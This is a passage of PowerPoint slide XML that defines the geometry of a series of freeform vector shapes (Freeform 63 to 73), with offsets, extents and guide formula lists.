                  <a:gd name="T12" fmla="*/ 0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0" name="Freeform 63"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="854" y="3229"/>
                <a:ext cx="146" cy="78"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 438"/>
                  <a:gd name="T1" fmla="*/ 0 h 236"/>
                  <a:gd name="T2" fmla="*/ 0 w 438"/>
                  <a:gd name="T3" fmla="*/ 0 h 236"/>
                  <a:gd name="T4" fmla="*/ 0 w 438"/>
                  <a:gd name="T5" fmla="*/ 0 h 236"/>
                  <a:gd name="T6" fmla="*/ 0 w 438"/>
                  <a:gd name="T7" fmla="*/ 0 h 236"/>
                  <a:gd name="T8" fmla="*/ 0 w 438"/>
                  <a:gd name="T9" fmla="*/ 0 h 236"/>
                  <a:gd name="T10" fmla="*/ 0 w 438"/>
                  <a:gd name="T11" fmla="*/ 0 h 236"/>
                  <a:gd name="T12" fmla="*/ 0 w 438"/>
                  <a:gd name="T13" fmla="*/ 0 h 236"/>
                  <a:gd name="T14" fmla="*/ 0 w 438"/>
                  <a:gd name="T15" fmla="*/ 0 h 236"/>
                  <a:gd name="T16" fmla="*/ 0 w 438"/>
                  <a:gd name="T17" fmla="*/ 0 h 236"/>
                  <a:gd name="T18" fmla="*/ 0 w 438"/>
                  <a:gd name="T19" fmla="*/ 0 h 236"/>
                  <a:gd name="T20" fmla="*/ 0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1" name="Freeform 64"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="774" y="3032"/>
                <a:ext cx="619" cy="562"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1857"/>
                  <a:gd name="T1" fmla="*/ 0 h 1687"/>
                  <a:gd name="T2" fmla="*/ 0 w 1857"/>
                  <a:gd name="T3" fmla="*/ 0 h 1687"/>
                  <a:gd name="T4" fmla="*/ 0 w 1857"/>
                  <a:gd name="T5" fmla="*/ 0 h 1687"/>
                  <a:gd name="T6" fmla="*/ 0 w 1857"/>
                  <a:gd name="T7" fmla="*/ 0 h 1687"/>
                  <a:gd name="T8" fmla="*/ 0 w 1857"/>
                  <a:gd name="T9" fmla="*/ 0 h 1687"/>
                  <a:gd name="T10" fmla="*/ 0 w 1857"/>
                  <a:gd name="T11" fmla="*/ 0 h 1687"/>
                  <a:gd name="T12" fmla="*/ 0 w 1857"/>
                  <a:gd name="T13" fmla="*/ 0 h 1687"/>
                  <a:gd name="T14" fmla="*/ 0 w 1857"/>
                  <a:gd name="T15" fmla="*/ 0 h 1687"/>
                  <a:gd name="T16" fmla="*/ 0 w 1857"/>
                  <a:gd name="T17" fmla="*/ 0 h 1687"/>
                  <a:gd name="T18" fmla="*/ 0 w 1857"/>
                  <a:gd name="T19" fmla="*/ 0 h 1687"/>
                  <a:gd name="T20" fmla="*/ 0 w 1857"/>
                  <a:gd name="T21" fmla="*/ 0 h 1687"/>
                  <a:gd name="T22" fmla="*/ 0 w 1857"/>
                  <a:gd name="T23" fmla="*/ 0 h 1687"/>
                  <a:gd name="T24" fmla="*/ 0 w 1857"/>
                  <a:gd name="T25" fmla="*/ 0 h 1687"/>
                  <a:gd name="T26" fmla="*/ 0 w 1857"/>
                  <a:gd name="T27" fmla="*/ 0 h 1687"/>
                  <a:gd name="T28" fmla="*/ 0 w 1857"/>
                  <a:gd name="T29" fmla="*/ 0 h 1687"/>
                  <a:gd name="T30" fmla="*/ 0 w 1857"/>
                  <a:gd name="T31" fmla="*/ 0 h 1687"/>
                  <a:gd name="T32" fmla="*/ 0 w 1857"/>
                  <a:gd name="T33" fmla="*/ 0 h 1687"/>
                  <a:gd name="T34" fmla="*/ 0 w 1857"/>
                  <a:gd name="T35" fmla="*/ 0 h 1687"/>
                  <a:gd name="T36" fmla="*/ 0 w 1857"/>
                  <a:gd name="T37" fmla="*/ 0 h 1687"/>
                  <a:gd name="T38" fmla="*/ 0 w 1857"/>
                  <a:gd name="T39" fmla="*/ 0 h 1687"/>
                  <a:gd name="T40" fmla="*/ 0 w 1857"/>
                  <a:gd name="T41" fmla="*/ 0 h 1687"/>
                  <a:gd name="T42" fmla="*/ 0 w 1857"/>
                  <a:gd name="T43" fmla="*/ 0 h 1687"/>
                  <a:gd name="T44" fmla="*/ 0 w 1857"/>
                  <a:gd name="T45" fmla="*/ 0 h 1687"/>
                  <a:gd name="T46" fmla="*/ 0 w 1857"/>
                  <a:gd name="T47" fmla="*/ 0 h 1687"/>
                  <a:gd name="T48" fmla="*/ 0 w 1857"/>
                  <a:gd name="T49" fmla="*/ 0 h 1687"/>
                  <a:gd name="T50" fmla="*/ 0 w 1857"/>
                  <a:gd name="T51" fmla="*/ 0 h 1687"/>
                  <a:gd name="T52" fmla="*/ 0 w 1857"/>
                  <a:gd name="T53" fmla="*/ 0 h 1687"/>
                  <a:gd name="T54" fmla="*/ 0 w 1857"/>
                  <a:gd name="T55" fmla="*/ 0 h 1687"/>
                  <a:gd name="T56" fmla="*/ 0 w 1857"/>
                  <a:gd name="T57" fmla="*/ 0 h 1687"/>
                  <a:gd name="T58" fmla="*/ 0 w 1857"/>
                  <a:gd name="T59" fmla="*/ 0 h 1687"/>
                  <a:gd name="T60" fmla="*/ 0 w 1857"/>
                  <a:gd name="T61" fmla="*/ 0 h 1687"/>
                  <a:gd name="T62" fmla="*/ 0 w 1857"/>
                  <a:gd name="T63" fmla="*/ 0 h 1687"/>
                  <a:gd name="T64" fmla="*/ 0 w 1857"/>
                  <a:gd name="T65" fmla="*/ 0 h 1687"/>
                  <a:gd name="T66" fmla="*/ 0 w 1857"/>
                  <a:gd name="T67" fmla="*/ 0 h 1687"/>
                  <a:gd name="T68" fmla="*/ 0 w 1857"/>
                  <a:gd name="T69" fmla="*/ 0 h 1687"/>
                  <a:gd name="T70" fmla="*/ 0 w 1857"/>
                  <a:gd name="T71" fmla="*/ 0 h 1687"/>
                  <a:gd name="T72" fmla="*/ 0 w 1857"/>
                  <a:gd name="T73" fmla="*/ 0 h 1687"/>
                  <a:gd name="T74" fmla="*/ 0 w 1857"/>
                  <a:gd name="T75" fmla="*/ 0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2" name="Freeform 65"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="756" y="3002"/>
                <a:ext cx="591" cy="398"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1774"/>
                  <a:gd name="T1" fmla="*/ 0 h 1195"/>
                  <a:gd name="T2" fmla="*/ 0 w 1774"/>
                  <a:gd name="T3" fmla="*/ 0 h 1195"/>
                  <a:gd name="T4" fmla="*/ 0 w 1774"/>
                  <a:gd name="T5" fmla="*/ 0 h 1195"/>
                  <a:gd name="T6" fmla="*/ 0 w 1774"/>
                  <a:gd name="T7" fmla="*/ 0 h 1195"/>
                  <a:gd name="T8" fmla="*/ 0 w 1774"/>
                  <a:gd name="T9" fmla="*/ 0 h 1195"/>
                  <a:gd name="T10" fmla="*/ 0 w 1774"/>
                  <a:gd name="T11" fmla="*/ 0 h 1195"/>
                  <a:gd name="T12" fmla="*/ 0 w 1774"/>
                  <a:gd name="T13" fmla="*/ 0 h 1195"/>
                  <a:gd name="T14" fmla="*/ 0 w 1774"/>
                  <a:gd name="T15" fmla="*/ 0 h 1195"/>
                  <a:gd name="T16" fmla="*/ 0 w 1774"/>
                  <a:gd name="T17" fmla="*/ 0 h 1195"/>
                  <a:gd name="T18" fmla="*/ 0 w 1774"/>
                  <a:gd name="T19" fmla="*/ 0 h 1195"/>
                  <a:gd name="T20" fmla="*/ 0 w 1774"/>
                  <a:gd name="T21" fmla="*/ 0 h 1195"/>
                  <a:gd name="T22" fmla="*/ 0 w 1774"/>
                  <a:gd name="T23" fmla="*/ 0 h 1195"/>
                  <a:gd name="T24" fmla="*/ 0 w 1774"/>
                  <a:gd name="T25" fmla="*/ 0 h 1195"/>
                  <a:gd name="T26" fmla="*/ 0 w 1774"/>
                  <a:gd name="T27" fmla="*/ 0 h 1195"/>
                  <a:gd name="T28" fmla="*/ 0 w 1774"/>
                  <a:gd name="T29" fmla="*/ 0 h 1195"/>
                  <a:gd name="T30" fmla="*/ 0 w 1774"/>
                  <a:gd name="T31" fmla="*/ 0 h 1195"/>
                  <a:gd name="T32" fmla="*/ 0 w 1774"/>
                  <a:gd name="T33" fmla="*/ 0 h 1195"/>
                  <a:gd name="T34" fmla="*/ 0 w 1774"/>
                  <a:gd name="T35" fmla="*/ 0 h 1195"/>
                  <a:gd name="T36" fmla="*/ 0 w 1774"/>
                  <a:gd name="T37" fmla="*/ 0 h 1195"/>
                  <a:gd name="T38" fmla="*/ 0 w 1774"/>
                  <a:gd name="T39" fmla="*/ 0 h 1195"/>
                  <a:gd name="T40" fmla="*/ 0 w 1774"/>
                  <a:gd name="T41" fmla="*/ 0 h 1195"/>
                  <a:gd name="T42" fmla="*/ 0 w 1774"/>
                  <a:gd name="T43" fmla="*/ 0 h 1195"/>
                  <a:gd name="T44" fmla="*/ 0 w 1774"/>
                  <a:gd name="T45" fmla="*/ 0 h 1195"/>
                  <a:gd name="T46" fmla="*/ 0 w 1774"/>
                  <a:gd name="T47" fmla="*/ 0 h 1195"/>
                  <a:gd name="T48" fmla="*/ 0 w 1774"/>
                  <a:gd name="T49" fmla="*/ 0 h 1195"/>
                  <a:gd name="T50" fmla="*/ 0 w 1774"/>
                  <a:gd name="T51" fmla="*/ 0 h 1195"/>
                  <a:gd name="T52" fmla="*/ 0 w 1774"/>
                  <a:gd name="T53" fmla="*/ 0 h 1195"/>
                  <a:gd name="T54" fmla="*/ 0 w 1774"/>
                  <a:gd name="T55" fmla="*/ 0 h 1195"/>
                  <a:gd name="T56" fmla="*/ 0 w 1774"/>
                  <a:gd name="T57" fmla="*/ 0 h 1195"/>
                  <a:gd name="T58" fmla="*/ 0 w 1774"/>
                  <a:gd name="T59" fmla="*/ 0 h 1195"/>
                  <a:gd name="T60" fmla="*/ 0 w 1774"/>
                  <a:gd name="T61" fmla="*/ 0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3" name="Freeform 66"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="743" y="3033"/>
                <a:ext cx="123" cy="147"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 369"/>
                  <a:gd name="T1" fmla="*/ 0 h 441"/>
                  <a:gd name="T2" fmla="*/ 0 w 369"/>
                  <a:gd name="T3" fmla="*/ 0 h 441"/>
                  <a:gd name="T4" fmla="*/ 0 w 369"/>
                  <a:gd name="T5" fmla="*/ 0 h 441"/>
                  <a:gd name="T6" fmla="*/ 0 w 369"/>
                  <a:gd name="T7" fmla="*/ 0 h 441"/>
                  <a:gd name="T8" fmla="*/ 0 w 369"/>
                  <a:gd name="T9" fmla="*/ 0 h 441"/>
                  <a:gd name="T10" fmla="*/ 0 w 369"/>
                  <a:gd name="T11" fmla="*/ 0 h 441"/>
                  <a:gd name="T12" fmla="*/ 0 w 369"/>
                  <a:gd name="T13" fmla="*/ 0 h 441"/>
                  <a:gd name="T14" fmla="*/ 0 w 369"/>
                  <a:gd name="T15" fmla="*/ 0 h 441"/>
                  <a:gd name="T16" fmla="*/ 0 w 369"/>
                  <a:gd name="T17" fmla="*/ 0 h 441"/>
                  <a:gd name="T18" fmla="*/ 0 w 369"/>
                  <a:gd name="T19" fmla="*/ 0 h 441"/>
                  <a:gd name="T20" fmla="*/ 0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4" name="Freeform 67"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1026" y="3265"/>
                <a:ext cx="96" cy="48"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 289"/>
                  <a:gd name="T1" fmla="*/ 0 h 144"/>
                  <a:gd name="T2" fmla="*/ 0 w 289"/>
                  <a:gd name="T3" fmla="*/ 0 h 144"/>
                  <a:gd name="T4" fmla="*/ 0 w 289"/>
                  <a:gd name="T5" fmla="*/ 0 h 144"/>
                  <a:gd name="T6" fmla="*/ 0 w 289"/>
                  <a:gd name="T7" fmla="*/ 0 h 144"/>
                  <a:gd name="T8" fmla="*/ 0 w 289"/>
                  <a:gd name="T9" fmla="*/ 0 h 144"/>
                  <a:gd name="T10" fmla="*/ 0 w 289"/>
                  <a:gd name="T11" fmla="*/ 0 h 144"/>
                  <a:gd name="T12" fmla="*/ 0 w 289"/>
                  <a:gd name="T13" fmla="*/ 0 h 144"/>
                  <a:gd name="T14" fmla="*/ 0 w 289"/>
                  <a:gd name="T15" fmla="*/ 0 h 144"/>
                  <a:gd name="T16" fmla="*/ 0 w 289"/>
                  <a:gd name="T17" fmla="*/ 0 h 144"/>
                  <a:gd name="T18" fmla="*/ 0 w 289"/>
                  <a:gd name="T19" fmla="*/ 0 h 144"/>
                  <a:gd name="T20" fmla="*/ 0 w 289"/>
                  <a:gd name="T21" fmla="*/ 0 h 144"/>
                  <a:gd name="T22" fmla="*/ 0 w 289"/>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5" name="Freeform 68"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="482" y="3713"/>
                <a:ext cx="1149" cy="245"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3447"/>
                  <a:gd name="T1" fmla="*/ 0 h 735"/>
                  <a:gd name="T2" fmla="*/ 0 w 3447"/>
                  <a:gd name="T3" fmla="*/ 0 h 735"/>
                  <a:gd name="T4" fmla="*/ 0 w 3447"/>
                  <a:gd name="T5" fmla="*/ 0 h 735"/>
                  <a:gd name="T6" fmla="*/ 0 w 3447"/>
                  <a:gd name="T7" fmla="*/ 0 h 735"/>
                  <a:gd name="T8" fmla="*/ 0 w 3447"/>
                  <a:gd name="T9" fmla="*/ 0 h 735"/>
                  <a:gd name="T10" fmla="*/ 0 w 3447"/>
                  <a:gd name="T11" fmla="*/ 0 h 735"/>
                  <a:gd name="T12" fmla="*/ 0 w 3447"/>
                  <a:gd name="T13" fmla="*/ 0 h 735"/>
                  <a:gd name="T14" fmla="*/ 0 w 3447"/>
                  <a:gd name="T15" fmla="*/ 0 h 735"/>
                  <a:gd name="T16" fmla="*/ 0 w 3447"/>
                  <a:gd name="T17" fmla="*/ 0 h 735"/>
                  <a:gd name="T18" fmla="*/ 0 w 3447"/>
                  <a:gd name="T19" fmla="*/ 0 h 735"/>
                  <a:gd name="T20" fmla="*/ 0 w 3447"/>
                  <a:gd name="T21" fmla="*/ 0 h 735"/>
                  <a:gd name="T22" fmla="*/ 1 w 3447"/>
                  <a:gd name="T23" fmla="*/ 0 h 735"/>
                  <a:gd name="T24" fmla="*/ 1 w 3447"/>
                  <a:gd name="T25" fmla="*/ 0 h 735"/>
                  <a:gd name="T26" fmla="*/ 1 w 3447"/>
                  <a:gd name="T27" fmla="*/ 0 h 735"/>
                  <a:gd name="T28" fmla="*/ 0 w 3447"/>
                  <a:gd name="T29" fmla="*/ 0 h 735"/>
                  <a:gd name="T30" fmla="*/ 0 w 3447"/>
                  <a:gd name="T31" fmla="*/ 0 h 735"/>
                  <a:gd name="T32" fmla="*/ 0 w 3447"/>
                  <a:gd name="T33" fmla="*/ 0 h 735"/>
                  <a:gd name="T34" fmla="*/ 0 w 3447"/>
                  <a:gd name="T35" fmla="*/ 0 h 735"/>
                  <a:gd name="T36" fmla="*/ 0 w 3447"/>
                  <a:gd name="T37" fmla="*/ 0 h 735"/>
                  <a:gd name="T38" fmla="*/ 0 w 3447"/>
                  <a:gd name="T39" fmla="*/ 0 h 735"/>
                  <a:gd name="T40" fmla="*/ 0 w 3447"/>
                  <a:gd name="T41" fmla="*/ 0 h 735"/>
                  <a:gd name="T42" fmla="*/ 0 w 3447"/>
                  <a:gd name="T43" fmla="*/ 0 h 735"/>
                  <a:gd name="T44" fmla="*/ 0 w 3447"/>
                  <a:gd name="T45" fmla="*/ 0 h 735"/>
                  <a:gd name="T46" fmla="*/ 0 w 3447"/>
                  <a:gd name="T47" fmla="*/ 0 h 735"/>
                  <a:gd name="T48" fmla="*/ 0 w 3447"/>
                  <a:gd name="T49" fmla="*/ 0 h 735"/>
                  <a:gd name="T50" fmla="*/ 0 w 3447"/>
                  <a:gd name="T51" fmla="*/ 0 h 735"/>
                  <a:gd name="T52" fmla="*/ 0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6" name="Freeform 69"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="645" y="2936"/>
                <a:ext cx="857" cy="599"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2571"/>
                  <a:gd name="T1" fmla="*/ 0 h 1796"/>
                  <a:gd name="T2" fmla="*/ 0 w 2571"/>
                  <a:gd name="T3" fmla="*/ 0 h 1796"/>
                  <a:gd name="T4" fmla="*/ 0 w 2571"/>
                  <a:gd name="T5" fmla="*/ 0 h 1796"/>
                  <a:gd name="T6" fmla="*/ 0 w 2571"/>
                  <a:gd name="T7" fmla="*/ 0 h 1796"/>
                  <a:gd name="T8" fmla="*/ 0 w 2571"/>
                  <a:gd name="T9" fmla="*/ 0 h 1796"/>
                  <a:gd name="T10" fmla="*/ 0 w 2571"/>
                  <a:gd name="T11" fmla="*/ 0 h 1796"/>
                  <a:gd name="T12" fmla="*/ 0 w 2571"/>
                  <a:gd name="T13" fmla="*/ 0 h 1796"/>
                  <a:gd name="T14" fmla="*/ 0 w 2571"/>
                  <a:gd name="T15" fmla="*/ 0 h 1796"/>
                  <a:gd name="T16" fmla="*/ 0 w 2571"/>
                  <a:gd name="T17" fmla="*/ 0 h 1796"/>
                  <a:gd name="T18" fmla="*/ 0 w 2571"/>
                  <a:gd name="T19" fmla="*/ 0 h 1796"/>
                  <a:gd name="T20" fmla="*/ 0 w 2571"/>
                  <a:gd name="T21" fmla="*/ 0 h 1796"/>
                  <a:gd name="T22" fmla="*/ 0 w 2571"/>
                  <a:gd name="T23" fmla="*/ 0 h 1796"/>
                  <a:gd name="T24" fmla="*/ 0 w 2571"/>
                  <a:gd name="T25" fmla="*/ 0 h 1796"/>
                  <a:gd name="T26" fmla="*/ 0 w 2571"/>
                  <a:gd name="T27" fmla="*/ 0 h 1796"/>
                  <a:gd name="T28" fmla="*/ 0 w 2571"/>
                  <a:gd name="T29" fmla="*/ 0 h 1796"/>
                  <a:gd name="T30" fmla="*/ 0 w 2571"/>
                  <a:gd name="T31" fmla="*/ 0 h 1796"/>
                  <a:gd name="T32" fmla="*/ 0 w 2571"/>
                  <a:gd name="T33" fmla="*/ 0 h 1796"/>
                  <a:gd name="T34" fmla="*/ 0 w 2571"/>
                  <a:gd name="T35" fmla="*/ 0 h 1796"/>
                  <a:gd name="T36" fmla="*/ 0 w 2571"/>
                  <a:gd name="T37" fmla="*/ 0 h 1796"/>
                  <a:gd name="T38" fmla="*/ 0 w 2571"/>
                  <a:gd name="T39" fmla="*/ 0 h 1796"/>
                  <a:gd name="T40" fmla="*/ 0 w 2571"/>
                  <a:gd name="T41" fmla="*/ 0 h 1796"/>
                  <a:gd name="T42" fmla="*/ 0 w 2571"/>
                  <a:gd name="T43" fmla="*/ 0 h 1796"/>
                  <a:gd name="T44" fmla="*/ 0 w 2571"/>
                  <a:gd name="T45" fmla="*/ 0 h 1796"/>
                  <a:gd name="T46" fmla="*/ 0 w 2571"/>
                  <a:gd name="T47" fmla="*/ 0 h 1796"/>
                  <a:gd name="T48" fmla="*/ 0 w 2571"/>
                  <a:gd name="T49" fmla="*/ 0 h 1796"/>
                  <a:gd name="T50" fmla="*/ 0 w 2571"/>
                  <a:gd name="T51" fmla="*/ 0 h 1796"/>
                  <a:gd name="T52" fmla="*/ 0 w 2571"/>
                  <a:gd name="T53" fmla="*/ 0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7" name="Freeform 70"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="710" y="3348"/>
                <a:ext cx="800" cy="375"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2400"/>
                  <a:gd name="T1" fmla="*/ 0 h 1125"/>
                  <a:gd name="T2" fmla="*/ 0 w 2400"/>
                  <a:gd name="T3" fmla="*/ 0 h 1125"/>
                  <a:gd name="T4" fmla="*/ 0 w 2400"/>
                  <a:gd name="T5" fmla="*/ 0 h 1125"/>
                  <a:gd name="T6" fmla="*/ 0 w 2400"/>
                  <a:gd name="T7" fmla="*/ 0 h 1125"/>
                  <a:gd name="T8" fmla="*/ 0 w 2400"/>
                  <a:gd name="T9" fmla="*/ 0 h 1125"/>
                  <a:gd name="T10" fmla="*/ 0 w 2400"/>
                  <a:gd name="T11" fmla="*/ 0 h 1125"/>
                  <a:gd name="T12" fmla="*/ 0 w 2400"/>
                  <a:gd name="T13" fmla="*/ 0 h 1125"/>
                  <a:gd name="T14" fmla="*/ 0 w 2400"/>
                  <a:gd name="T15" fmla="*/ 0 h 1125"/>
                  <a:gd name="T16" fmla="*/ 0 w 2400"/>
                  <a:gd name="T17" fmla="*/ 0 h 1125"/>
                  <a:gd name="T18" fmla="*/ 0 w 2400"/>
                  <a:gd name="T19" fmla="*/ 0 h 1125"/>
                  <a:gd name="T20" fmla="*/ 0 w 2400"/>
                  <a:gd name="T21" fmla="*/ 0 h 1125"/>
                  <a:gd name="T22" fmla="*/ 0 w 2400"/>
                  <a:gd name="T23" fmla="*/ 0 h 1125"/>
                  <a:gd name="T24" fmla="*/ 0 w 2400"/>
                  <a:gd name="T25" fmla="*/ 0 h 1125"/>
                  <a:gd name="T26" fmla="*/ 0 w 2400"/>
                  <a:gd name="T27" fmla="*/ 0 h 1125"/>
                  <a:gd name="T28" fmla="*/ 0 w 2400"/>
                  <a:gd name="T29" fmla="*/ 0 h 1125"/>
                  <a:gd name="T30" fmla="*/ 0 w 2400"/>
                  <a:gd name="T31" fmla="*/ 0 h 1125"/>
                  <a:gd name="T32" fmla="*/ 0 w 2400"/>
                  <a:gd name="T33" fmla="*/ 0 h 1125"/>
                  <a:gd name="T34" fmla="*/ 0 w 2400"/>
                  <a:gd name="T35" fmla="*/ 0 h 1125"/>
                  <a:gd name="T36" fmla="*/ 0 w 2400"/>
                  <a:gd name="T37" fmla="*/ 0 h 1125"/>
                  <a:gd name="T38" fmla="*/ 0 w 2400"/>
                  <a:gd name="T39" fmla="*/ 0 h 1125"/>
                  <a:gd name="T40" fmla="*/ 0 w 2400"/>
                  <a:gd name="T41" fmla="*/ 0 h 1125"/>
                  <a:gd name="T42" fmla="*/ 0 w 2400"/>
                  <a:gd name="T43" fmla="*/ 0 h 1125"/>
                  <a:gd name="T44" fmla="*/ 0 w 2400"/>
                  <a:gd name="T45" fmla="*/ 0 h 1125"/>
                  <a:gd name="T46" fmla="*/ 0 w 2400"/>
                  <a:gd name="T47" fmla="*/ 0 h 1125"/>
                  <a:gd name="T48" fmla="*/ 0 w 2400"/>
                  <a:gd name="T49" fmla="*/ 0 h 1125"/>
                  <a:gd name="T50" fmla="*/ 0 w 2400"/>
                  <a:gd name="T51" fmla="*/ 0 h 1125"/>
                  <a:gd name="T52" fmla="*/ 0 w 2400"/>
                  <a:gd name="T53" fmla="*/ 0 h 1125"/>
                  <a:gd name="T54" fmla="*/ 0 w 2400"/>
                  <a:gd name="T55" fmla="*/ 0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8" name="Freeform 71"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="787" y="3660"/>
                <a:ext cx="132" cy="77"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 396"/>
                  <a:gd name="T1" fmla="*/ 0 h 232"/>
                  <a:gd name="T2" fmla="*/ 0 w 396"/>
                  <a:gd name="T3" fmla="*/ 0 h 232"/>
                  <a:gd name="T4" fmla="*/ 0 w 396"/>
                  <a:gd name="T5" fmla="*/ 0 h 232"/>
                  <a:gd name="T6" fmla="*/ 0 w 396"/>
                  <a:gd name="T7" fmla="*/ 0 h 232"/>
                  <a:gd name="T8" fmla="*/ 0 w 396"/>
                  <a:gd name="T9" fmla="*/ 0 h 232"/>
                  <a:gd name="T10" fmla="*/ 0 w 396"/>
                  <a:gd name="T11" fmla="*/ 0 h 232"/>
                  <a:gd name="T12" fmla="*/ 0 w 396"/>
                  <a:gd name="T13" fmla="*/ 0 h 232"/>
                  <a:gd name="T14" fmla="*/ 0 w 396"/>
                  <a:gd name="T15" fmla="*/ 0 h 232"/>
                  <a:gd name="T16" fmla="*/ 0 w 396"/>
                  <a:gd name="T17" fmla="*/ 0 h 232"/>
                  <a:gd name="T18" fmla="*/ 0 w 396"/>
                  <a:gd name="T19" fmla="*/ 0 h 232"/>
                  <a:gd name="T20" fmla="*/ 0 w 396"/>
                  <a:gd name="T21" fmla="*/ 0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59" name="Freeform 72"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="928" y="3687"/>
                <a:ext cx="476" cy="67"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1427"/>
                  <a:gd name="T1" fmla="*/ 0 h 201"/>
                  <a:gd name="T2" fmla="*/ 0 w 1427"/>
                  <a:gd name="T3" fmla="*/ 0 h 201"/>
                  <a:gd name="T4" fmla="*/ 0 w 1427"/>
                  <a:gd name="T5" fmla="*/ 0 h 201"/>
                  <a:gd name="T6" fmla="*/ 0 w 1427"/>
                  <a:gd name="T7" fmla="*/ 0 h 201"/>
                  <a:gd name="T8" fmla="*/ 0 w 1427"/>
                  <a:gd name="T9" fmla="*/ 0 h 201"/>
                  <a:gd name="T10" fmla="*/ 0 w 1427"/>
                  <a:gd name="T11" fmla="*/ 0 h 201"/>
                  <a:gd name="T12" fmla="*/ 0 w 1427"/>
                  <a:gd name="T13" fmla="*/ 0 h 201"/>
                  <a:gd name="T14" fmla="*/ 0 w 1427"/>
                  <a:gd name="T15" fmla="*/ 0 h 201"/>
                  <a:gd name="T16" fmla="*/ 0 w 1427"/>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0" name="Freeform 73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="623" y="3814"/>
                <a:ext cx="567" cy="65"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1701"/>
                  <a:gd name="T1" fmla="*/ 0 h 194"/>
                  <a:gd name="T2" fmla="*/ 0 w 1701"/>
                  <a:gd name="T3" fmla="*/ 0 h 194"/>
                  <a:gd name="T4" fmla="*/ 0 w 1701"/>
                  <a:gd name="T5" fmla="*/ 0 h 194"/>
                  <a:gd name="T6" fmla="*/ 0 w 1701"/>
                  <a:gd name="T7" fmla="*/ 0 h 194"/>
                  <a:gd name="T8" fmla="*/ 0 w 1701"/>
                  <a:gd name="T9" fmla="*/ 0 h 194"/>
                  <a:gd name="T10" fmla="*/ 0 w 1701"/>
                  <a:gd name="T11" fmla="*/ 0 h 194"/>
                  <a:gd name="T12" fmla="*/ 0 w 1701"/>
                  <a:gd name="T13" fmla="*/ 0 h 194"/>
                  <a:gd name="T14" fmla="*/ 0 w 1701"/>
                  <a:gd name="T15" fmla="*/ 0 h 194"/>
                  <a:gd name="T16" fmla="*/ 0 w 1701"/>
                  <a:gd name="T17" fmla="*/ 0 h 194"/>
                  <a:gd name="T18" fmla="*/ 0 w 1701"/>
                  <a:gd name="T19" fmla="*/ 0 h 194"/>
                  <a:gd name="T20" fmla="*/ 0 w 1701"/>
                  <a:gd name="T21" fmla="*/ 0 h 194"/>
                  <a:gd name="T22" fmla="*/ 0 w 1701"/>
                  <a:gd name="T23" fmla="*/ 0 h 194"/>
                  <a:gd name="T24" fmla="*/ 0 w 1701"/>
                  <a:gd name="T25" fmla="*/ 0 h 194"/>
                  <a:gd name="T26" fmla="*/ 0 w 1701"/>
                  <a:gd name="T27" fmla="*/ 0 h 194"/>
                  <a:gd name="T28" fmla="*/ 0 w 1701"/>
                  <a:gd name="T29" fmla="*/ 0 h 194"/>
                  <a:gd name="T30" fmla="*/ 0 w 1701"/>
                  <a:gd name="T31" fmla="*/ 0 h 194"/>
                  <a:gd name="T32" fmla="*/ 0 w 1701"/>
                  <a:gd name="T33" fmla="*/ 0 h 194"/>
                  <a:gd name="T34" fmla="*/ 0 w 1701"/>
                  <a:gd name="T35" fmla="*/ 0 h 194"/>
                  <a:gd name="T36" fmla="*/ 0 w 1701"/>
                  <a:gd name="T37" fmla="*/ 0 h 194"/>
                  <a:gd name="T38" fmla="*/ 0 w 1701"/>
                  <a:gd name="T39" fmla="*/ 0 h 194"/>
                  <a:gd name="T40" fmla="*/ 0 w 1701"/>
                  <a:gd name="T41" fmla="*/ 0 h 194"/>
                  <a:gd name="T42" fmla="*/ 0 w 1701"/>
                  <a:gd name="T43" fmla="*/ 0 h 194"/>
